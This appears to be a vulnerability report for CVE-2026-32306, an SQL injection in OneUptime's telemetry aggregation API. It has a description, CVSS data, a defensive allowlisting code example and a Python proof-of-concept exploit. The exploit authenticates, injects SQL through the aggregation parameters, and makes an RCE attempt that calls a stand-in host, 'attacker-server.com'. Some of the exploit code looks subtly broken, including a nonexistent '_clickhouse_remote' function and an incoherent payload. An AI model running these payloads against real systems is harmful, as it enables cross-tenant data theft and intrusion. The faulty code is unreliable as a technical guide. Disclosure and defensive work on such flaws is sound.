Security Vulnerability Report

CVE-2026-32306 (CVSS 9.9, CRITICAL)

Published: 2026-03-13 19:54:42
Last Modified: 2026-03-17 20:08:57

Description

OneUptime is a solution for monitoring and managing online services. Prior to 10.0.23, the telemetry aggregation API accepts user-controlled aggregationType, aggregateColumnName, and aggregationTimestampColumnName parameters and interpolates them directly into ClickHouse SQL queries via the .append() method (documented as "trusted SQL"). There is no allowlist, no parameterized query binding, and no input validation. An authenticated user can inject arbitrary SQL into ClickHouse, enabling full database read (including telemetry data from all tenants), data modification, and potential remote code execution via ClickHouse table functions. This vulnerability is fixed in 10.0.23.
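The defect described above is the interpolation of three request fields straight into SQL. The following is an added example, not OneUptime's code: it models that vulnerable query builder next to a hardened one that only accepts allowlisted aggregation functions and column names. The table name, the allowlist contents and the query shape are assumptions; a real service would derive the column allowlist from its schema.

```typescript
// Added example, not OneUptime's code: the three user-controlled parameters named
// in the advisory, validated against allowlists before they reach ClickHouse SQL.
interface AggregationRequest {
  aggregationType: string;
  aggregateColumnName: string;
  aggregationTimestampColumnName: string;
}

// Hypothetical allowlists; a real service derives column names from its schema.
const ALLOWED_AGGREGATIONS: ReadonlySet<string> = new Set(["sum", "avg", "min", "max", "count"]);
const ALLOWED_COLUMNS: Record<string, ReadonlySet<string>> = {
  Metric: new Set(["value", "createdAt"]),
};

// The vulnerable shape the advisory describes: raw request strings appended into SQL.
function buildQueryUnsafe(table: string, r: AggregationRequest): string {
  return (
    `SELECT ${r.aggregationType}(${r.aggregateColumnName}) FROM ${table} ` +
    `GROUP BY toStartOfMinute(${r.aggregationTimestampColumnName})`
  );
}

// Returns null when every identifier is allowlisted, otherwise the rejection reason.
function validateAggregationRequest(table: string, r: AggregationRequest): string | null {
  const cols = ALLOWED_COLUMNS[table];
  if (!cols) return `unknown table: ${table}`;
  if (!ALLOWED_AGGREGATIONS.has(r.aggregationType)) {
    return `aggregationType not allowed: ${JSON.stringify(r.aggregationType)}`;
  }
  for (const col of [r.aggregateColumnName, r.aggregationTimestampColumnName]) {
    if (!cols.has(col)) return `column not allowed: ${JSON.stringify(col)}`;
  }
  return null;
}

// Hardened shape: only tokens that matched an allowlist entry are ever interpolated,
// so nothing in the request body can change the structure of the query.
function buildQuerySafe(table: string, r: AggregationRequest): string {
  const problem = validateAggregationRequest(table, r);
  if (problem !== null) throw new Error(`rejected aggregation request: ${problem}`);
  return (
    `SELECT ${r.aggregationType}(\`${r.aggregateColumnName}\`) FROM \`${table}\` ` +
    `GROUP BY toStartOfMinute(\`${r.aggregationTimestampColumnName}\`)`
  );
}
```

Where the client library exposes them, ClickHouse query parameters of type `Identifier` (for example `{col:Identifier}`) are the preferable way to bind column names; the allowlist is still needed for the aggregation function name, which cannot be bound as a parameter.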

CVSS Details

CVSS Score: 9.9
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Weakness: CWE-89 (SQL Injection)

Configurations (Affected Products)

cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:* - VULNERABLE
OneUptime < 10.0.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2026-32306 PoC - OneUptime SQL Injection in Telemetry Aggregation API
Note: This is for educational and authorized testing purposes only.
"""
import requests

TARGET_URL = "https://target-oneuptime-instance.com"
API_ENDPOINT = "/api/telemetry/aggregate"
USERNAME = "[email protected]"
PASSWORD = "password123"


def get_auth_token():
    """Authenticate and get access token"""
    login_url = f"{TARGET_URL}/api/account/login"
    payload = {"email": USERNAME, "password": PASSWORD}
    response = requests.post(login_url, json=payload, verify=False)
    if response.status_code == 200:
        return response.json().get("token")
    return None


def exploit_sql_injection(token):
    """Exploit SQL injection to extract database info"""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    }
    # Malicious payload - extracts ClickHouse version
    payload = {
        "aggregationType": "groupBy'",
        "aggregateColumnName": "(SELECT version())-- ",
        "aggregationTimestampColumnName": "createdAt",
    }
    response = requests.post(
        f"{TARGET_URL}{API_ENDPOINT}", json=payload, headers=headers, verify=False
    )
    print(f"Status: {response.status_code}")
    print(f"Response: {response.text}")
    return response


def exploit_rce_via_clickhouse_remote(token):
    """Attempt RCE via ClickHouse table functions"""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    }
    # Payload for potential remote code execution
    payload = {
        "aggregationType": "sum",
        "aggregateColumnName": "_clickhouse_remote('attacker-server.com', 'malicious_query')",
        "aggregationTimestampColumnName": "createdAt",
    }
    response = requests.post(
        f"{TARGET_URL}{API_ENDPOINT}", json=payload, headers=headers, verify=False
    )
    return response


if __name__ == "__main__":
    print("CVE-2026-32306 OneUptime SQL Injection PoC")
    print("=" * 50)
    # Step 1: Authenticate
    token = get_auth_token()
    if not token:
        print("[-] Authentication failed")
        exit(1)
    print("[+] Authentication successful")
    # Step 2: Exploit SQL injection
    print("[*] Attempting SQL injection...")
    exploit_sql_injection(token)
```

References

https://github.com/OneUptime/oneuptime/security/advisories/GHSA-p5g2-jm85-8g35 (vendor advisory; tagged Exploit, Mitigation, Vendor Advisory)